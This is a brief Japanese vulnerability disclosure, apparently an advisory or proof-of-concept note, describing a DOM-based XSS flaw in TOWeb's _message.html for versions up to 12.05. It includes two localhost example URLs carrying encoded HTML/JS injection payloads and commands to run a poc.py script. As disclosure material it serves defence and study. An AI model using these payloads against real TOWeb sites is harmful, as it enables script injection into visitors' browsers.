
(DOM-based XSS) TOWeb v.12.05以前のHTMLインジェクション脆弱性により、攻撃者は_message.htmlコンポーネントを介してHTML/JSコードを注入できる可能性があります。
参照: https://www.lauyan.com/en/toweb-updates.html#iyFEw37D
(DOMベースのXSS) TOWeb バージョン 5 <= 12.05 の HTML インジェクションの脆弱性により、攻撃者は _message.html コンポーネントを介して HTML/JS コードを注入できます。
_message.html ファイルは、? の右側にある暗号をデコードして実行することで、エラーページを表示するために使用されます。127.0.0.1:8000/_message.html?==gP2lGZvwjP2lGZvwjPyJGP+InY84DcvwDZuV3bGBCdv5EIldWYQ5Dc84jMo9CPg4jMoxjPiEmchBXL3RnI9M3chx2YgYXakxjPxg2L8IXdlJncF5TMoxjPiIXZ05WZjpjbnlGbh1Cd4VGdi0TZslHdzBidpRGP)python3 poc.py; python3 -m http.server -d src -> 例: http://127.0.0.1:8000/_message.html?==gC+QHcpJ3Yz9CPpcyUThFIkV2chJWLN9ERngCdyVGbh5DdwlmcjNHP